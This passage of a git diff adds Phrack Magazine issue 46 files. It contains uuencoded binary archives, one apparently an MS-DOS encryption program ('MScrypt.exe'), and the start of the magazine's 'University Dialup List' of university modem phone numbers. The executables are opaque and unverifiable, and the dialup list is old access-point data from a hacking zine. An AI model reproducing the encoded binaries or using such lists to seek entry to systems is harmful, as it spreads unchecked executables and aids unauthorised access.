+M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h
+M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%W<Q/85h
+MJWQMTYRN%V)8O)>B*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h
+M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$<U"19^h
+MQ9C8`]O;'`MQ)[6(DCQ[HK%DZ/4N75B',L)6+7UR@:SOXL.+7Q8E<<-ZZV_!h
+MK%8L.N)/N)6JP`2^%.;)\]KR9N!?_E\GNK![7KD=/\WD_RBFA-/E>3JK",?5h
+MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZ<PJV<BV',h
+M]6+#X-?3=E`;,OY47F=K6[5):\^"URY`[]=,$N#%^E-,7$[:_])ODRSY,<.Ph
+M_/+!E608HX/*9@0X-2'2NYDK0:HO+#%NN?NAR8.^@+[*>FL&T=S:;I"])OR>h
+M+^D+T!F`O334(^(<BKF(-[GK(-GBP???@Z^E_4??C#Z.UY5PHGV@\)TH9@HMh
+M66X>=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h
+M4E4C&1)FMM]?I$?&@R<DN<#.;2,M+U(G.G2UIG`Z-*F9'.8IB?<OG6T@Z^;$h
+M^I@KV9LQ7+(U38VZU[_@'(UYY#OJ2->=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h
+M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h
+M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh
+M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh
+M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h
+M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh
+MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h
+MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh
+MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh
+MQZK*RH<QLS6WVQF7E/JTU_GC[=:Z\&^3&&MN`8(;S.QV'6LC_4_^?0-I?B3_h
+M[NA`)6N+_W\8K6)IH>LZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h
+MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h
+?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h
+`h
+end
+
+ExorCrypt MSdos version:
+
+-=) S.Encode v2.5 (=-
+begin 777 MScrypt.zip
+M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C<GEP="YE>&4/`!(#h
+M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh
+M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh
+M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h
+M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h
+MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h
+M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h
+M^NL`<?,<@$]3'B&5)2MN*=%%/7_TEQ$D;6<VX6=*EQ+M_M%'V=H1L`VK;FLWh
+M@*?A]4GM$;^>(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h
+MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh
+MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(O<T/J-.X#7@8K9RY'L/;Xh
+MUO8!3HU/Z/4C\6M\?GE\`'2&K=]!*NP+\___)/,^*N"-\Y7`[(MO_C]HG.!>h
+MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h
+MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN<!_T/&;0J:E@3M!'&C8J8+h
+M,7-?S#0>9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h
+MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h
+M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h
+M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3L<?<`"T>Y/_;h
+M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh
+MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h
+M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h
+M-XA7(&/M,[<-O4<Z>[[`]^F_!K1!/1]JWU6W5<MT[;2#]L?;=!Q\YG^3@'L"h
+MI,LR-T.`OC4#G&^:[L+<__\T>?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h
+MM?A[0&<H`P1\BOI?1DUDJ.4JM"\<,-V"@!]!#W1IWO.^`0O\)9QD#@"9[$3Gh
+MC1M4M['R[-CLOH46_"4\^D3<S)=&#QB`G4D":YZM`'%:4#8W"P"99+.G=0-<h
+MH/<2[16M=1?TLJ7R!2J[^+"G"(":TS40MIS=8T^0EN";E/C!76VHS>JQN,53h
+M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh
+MN+C@PJ("Z<K_WW&]^V$+7_FEAO_!Q7VR`]K4,N.\H.C;"D!=Q87VZ6WZS[J8h
+M^TIL2GJG1W<@/?_'_P\?98BG__"Z6YUI/U?O+9,\?]8RP8O?#YA^%:!:O/_Ch
+M#N!OJ)>Q>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh
+MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h
+M23L7:<?*4R1=DCRY3(*%KB<_,WD0[Y37)VT*)SD_?7'PZ.DG1D=%F2M?'P#?h
+MX%\![R>Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h
+M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh
+MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih
+M(</,T]GF24OSVLPI0_+'#VQ^BC6\G<&KF"7TI?G%Z1?G3W*9NM`^78B.C:76h
+M/CBZ#9T0+A*%]1>]#)2D_\7]HY<?X+A_O/H[P>,<&>#7Q<^B'X@_L0M=3[=Vh
+M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h
+M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`<I>;$^<L+Q3L+:AIA(h
+MM`)I`]'LO]#3BZ$/--#(RZV9TT#A/+=DP0>W>W3LL0=.1\\X^Z(Q^\KE`X,[h
+MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh
+M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh
+M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h
+MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h
+M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h
+M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh
+M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h
+M//KX@=B&MW_HZ&SS!$-=.<!4OK[@8B(F/K:3[\/YO\U8,=&#*LF)X8T0OE*Bh
+M`D;/"_8H^[H8!_&":,5AA1T1AH@@ZX]I)]BG]U,P:CE9>8[_[*MW+W^A]FQ`h
+MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh
+MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h
+MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h
+MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh
+M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h
+M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h
+M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h
+MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh
+MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h
+M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h
+M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h
+M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih
+M]F"$VS\(D:X6R-<CD,[]1O!M3O=(KSCZHP!TC_O;>@"'Q\S-\B(3:]/K2^R>h
+M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh
+M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h
+MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h
+MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh
+MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B<EO1="J-'HK/<@%/@`_,`H4h
+MWGW,`^S+P%Q#)7\?^RCBI%O.P9EQ<'M=`T21/%T,[,C[:B/]W57_COHQYOI7h
+ML&3ZOP/OTO8>&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$<!_%B1A;>J9U`QHI3OF-h
+MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h
+M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h
+M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h
+M1UL@6C&^)N9RX;CD<GG;IH?"$C3)E)2`G#D"?Y>4S`,D.Z+9%^5240VLL9Y0h
+M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh
+MB'^*D$OZ%L>/NH<SJ48U%75`3P!HC@MH3:?$F$U._]OXCFY23X^C!S$C^+PAh
+M;PN+HZ_V_8GO2[#[H;CN^+\GF2PI@N/+`N1SA,\T@&M3?#:F=&VGB_VOA]G3h
+MS;=*@L)OCE7>\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0<KAA8;KUCO,h
+M5QJ'Z@%@OWN`3M5[E6=Y=.W\\H@QNV%_9+!/@L>`FO4]C+Y-<XA.=04_QZQ@h
+MK,]6(V.%6/<"Z#--_*H`+WIBJ_Z`*(GZBL@S]/:/T$UIFR?2#AZ//IB)'1%Yh
+M[N&P9(J^8'PZC:[KIJ@^DK>ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh
+MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`<W\Y@,:1F-)DNH9-^OV"05('M_=*9"IOh
+M>B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]<BMO=9=<4'$!":.'^09ED^Gh
+MSA*DD2[>AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h
+M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h
+ML#HRZ.-^*>"<VC8VK6]Y>4I/?Z4]"YV1`@7F9VN"$_<R@G:]B9>I%8WN=.X7h
+M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh
+M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h
+MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.<YEX%h
+M7!PJ#8B8VP.%C0K]@K/T_U.!>!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h
+M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh
+MH+Y?_,-L+V"V<PN:/M!8'M#`94`+>(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h
+M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h
+MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h
+M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h
+M5JC^U_J['!3/9+%O$39),*[M.J)M2QW&#6/9"Y3-I,PO&$_B*,6EL%]/H'L\h
+MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h
+MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6<B]`>.h
+MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h
+MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh
+MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h
+M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h
+M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h
+M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h
+M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h
+MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h
+M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)<H9%RIF>7JTW<JIPLJ`L>X+4=</(`h
+M<&D`N%SNKRYKW1Y`QJ"TS.0EQEU@;`A/.P*=8>R#^'RN($PTQO3%_2N@4D([h
+MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh
+M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh
+MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh
+MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th
+M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh
+M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h
+M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th
+M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h
+MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HK<L/2BNK3<V4WE+64J-#N=?7L"%^!h
+M$#Y);H-Q<$+3"A=K"YI\%C1/#C!K:/<`=Q*?:W`EL8WX_W!#>KV^(YI3OG!;h
+M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h
+M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h
+MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h
+M><;:&4??&<WB;Y*Q1R8;YS^E8)/&#4H5,(7NGFX)^8ZFP-[?U=KK:ES<U=!'h
+M$931"3K&OIZB2?\.]*LQI37CZSN/2>V./2+)ZYOK>7VU@2\W<7RG,=289$"@h
+M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh
+M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h
+MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h
+M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]<EU$.PVh
+M,0-$HN9WWM.13F2B.P.?-5"`7N?:H(,']J?=ZC5T*2<&PBK_$:;WX.$/HV^/h
+M/7#Z>MI(+L?3[S1(I<C3EV1P3W1\HJ,-K@]4/E7Z,Z#B.8`4&C*:K"M/XN5Sh
+MUCZ0H]R<BZ<[#M9V4Y_3HY"N-Q$UC[XN6*@]X<#LH7/Y5J#GM)7@MDC;UELXh
+M7_(AA7.TV-7%UWI/%Q&TU"[0;#"^'SUII,D*[C3(^ER:16+(MF>>N0TWH_3Wh
+M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h
+M2:W0(%CJMRIM<I;7PR<06)2A:M^(@_=E$#/@+0K'4;MD=G8`%PV)8"R;8Q7Zh
+MOR@@YNMQ3''TZ6(2<P3>@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h
+MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h
+MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh
+MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h
+M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h
+MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h
+M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK<WAKh
+M+T_:;)P);^]:C5T+TO)B`GIX0"^/2]0RQ;3_A<B':;V;P&SSZ_OK#T)"U@?@h
+M'^E\5U>:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%<Z24_/0EBh
+M+PG4?+::;I4N\R=KKZ[=A"W(=`M`=.T`FD??7`"QDQVXXP/WE3L*8A+JQ017h
+M#/@#3*)[=2=S:3+&\G8?='<ZX-%%'UX.C'F9\ULAF)<_7R_PZ3JB)DCTXOW\h
+M\G^U&/P$O-5<$`S#N8#2>75Z5=ISL/@K6."-<@QRVID_*6&<X7IU5_O`8UF?h
+M(JY4G'T.TL'GL"-K'QZPH%/<%H>D%_H(@#W:>G5D<<ZO+/6^!RQ5T^O8/7G#h
+M+G8/R!54GR/CM1?UL'8?+7CC]/0&`^R9K9[M^T`Z,6JO]()$%9#S26MD1]<Ch
+M[Y&7!SV:D^>=&\#MZ9OO%:<Q1-%72D^/+#`E(:^NMNCT>/]#>C:T:U(-H;^Dh
+M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h
+M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh
+MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h
+M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h
+M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PA</KBO/Dh
+MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h
+MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h
+M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh
+M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh
+MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h
+M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h
+ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h
+M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh
+M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh
+M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h
+M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
+MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
+M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
+M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
+M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
+MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
+M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
+MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
+MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
+M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
+$``````#!h
+`h
+end
+
+-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
diff --git a/phrack46/13.txt b/phrack46/13.txt
new file mode 100644
index 0000000..89c9fdd
--- /dev/null
+++ b/phrack46/13.txt
@@ -0,0 +1,700 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 13 of 28
+
+****************************************************************************
+
+                        The Phrack University Dialup List
+
+
+[We've been compiling all these for months now, and still have
+ hundreds more to add.  If you know dialups for any other .EDU
+ sites or Universities elsewhere in the world that are on
+ the Internet, please mail them to us at phrack@well.com.
+
+ Please, Universities ONLY...this is a list to assist students.  :)  ]
+
+-----------------------------------------------------------------------------
+
+201-529-6731    RAMAPO.EDU
+
+201-596-3500    NJIT.EDU
+
+201-648-1010    RUTGERS.EDU
+
+203-432-9642    YALE.EDU
+
+205-895-6792    UAH.EDU
+
+206-296-6250    SEATTLEU.EDU
+
+206-552-5996    WASHINGTON.EDU
+    685-7724
+        7796
+
+209-278-7366    CSUFRESNO.EDU
+
+209-632-7522    CALSTATE.EDU
+
+209-474-5784    CSUSTAN.EDU
+    523-2173
+    667-3130
+    723-2810
+
+210-381-3681    PANAM.EDU
+        3590
+
+210-982-0289    UTB.EDU
+
+212-206-1571    NEWSCHOOL.EDU
+    229-5326
+
+212-854-1812    COLUMBIA.EDU
+        1824
+        1896
+        3726
+        9924
+
+212-995-3600    NYU.EDU
+        4343
+
+213-225-6028    CALSTATELA.EDU
+
+213-259-2732    OXY.EDU
+
+213-740-9500    USC.EDU
+
+214-368-1721    SMU.EDU
+        3131
+
+215-359-5071    DCCC.EDU
+
+215-436-2199    WCUPA.EDU
+        6935
+
+215-489-0351    URSINIUS.EDU
+
+215-572-5784    BEAVER.EDU
+
+215-641-6436    MC3.EDU
+
+215-204-1010    TEMPLE.EDU
+        9630
+        9638
+
+215-889-1336    PSU.EDU
+
+215-895-1600    DREXEL.EDU
+        5896
+
+215-896-1318    HAVERFORD.EDU
+        1824
+
+215-898-8670    UPENN.EDU
+        6184
+        0834
+        3157
+
+216-368-8888    CWRU.EDU
+
+217-333-4000    UIUC.EDU
+        3700
+    244-5109
+        4976
+    255-9000
+
+219-237-4116    INDIANA.EDU
+        4117
+        4186
+        4187
+        4190
+        4413
+        4415
+    262-1082
+    481-6905
+    980-6553
+        6556
+        6866
+        6869
+
+219-989-2900    PURDUE.EDU
+
+301-403-4444    UMD.EDU
+
+303-270-4865    COLORADO.EDU
+    447-1564
+    492-0346
+        1900
+        1949
+        1953
+        1968
+        1998
+    938-1283
+
+303-458-3588    REGIS.EDU
+
+303-556-4982    MSCD.EDU
+    623-0763
+        0774
+    892-1014
+
+303-698-0515    DU.EDU
+    871-3319
+        3324
+        4770
+
+309-438-8070    ILSTU.EDU
+        8200
+
+309-677-3250    BRADLEY.EDU
+
+310-769-1892    CALSTATE.EDU
+
+310-985-9540    CSULB.EDU
+
+312-362-1061    DEPAUL.EDU
+
+312-413-3200    UIC.EDU
+        3212
+
+312-753-0975    UCHICAGO.EDU
+
+313-764-4800    MERIT.EDU
+    258-6811
+
+313-487-4451    EMICH.EDU
+
+314-883-7000    MISSOURI.EDU
+
+315-443-1320    SYR.EDU
+        1330
+        3396
+        1045
+
+317-285-1000    BSU.EDU
+        1003
+        1005
+        1019
+        1048
+        1064
+        1068
+        1070
+        1076
+        1077
+        1087
+        1088
+        1089
+        1090
+        1099
+        1107
+        1108
+
+317-494-6106    PURDUE.EDU
+    496-2000
+
+317-455-2426    INDIANA.EDU
+    973-8265
+
+318-261-9662    USL.EDU
+        9674
+
+319-335-6200    UIOWA.EDU
+
+402-280-2119    CREIGHTON.EDU
+
+404-727-8644    EMORY.EDU
+
+404-894-2191    GATECH.EDU
+        2193
+        2195
+
+407-722-2202    FIT.EDU
+
+407-823-2020    UCF.EDU
+
+407-835-4488    PBAC.EDU
+
+408-425-8930    UCSC.EDU
+
+408-554-5050    SCU.EDU
+        9652
+
+408-924-1054    CALSTATE.EDU
+
+409-294-1965    SHSU.EDU
+
+409-568-6028    SFASU.EDU
+
+410-329-3281    UMD.EDU
+    744-8000
+    333-7447
+    
+410-516-4620    JHU.EDU
+        5350
+
+410-788-7854    UMBC.EDU
+
+410-837-5750    UBALT.EDU
+
+412-396-5101    DUQ.EDU
+
+412-578-9896    CMU.EDU
+    268-6901
+    856-0815
+
+412-621-5954    PITT.EDU
+        2582
+        3655
+        3720
+        8072
+    836-7123
+        9997
+
+412-938-4063    CUP.EDU
+
+413-538-2345    MTHOLYOKE.EDU
+
+413-545-0755    UMASS.EDU
+        3161
+        3050
+        3056
+        5345
+        3100
+        3780
+
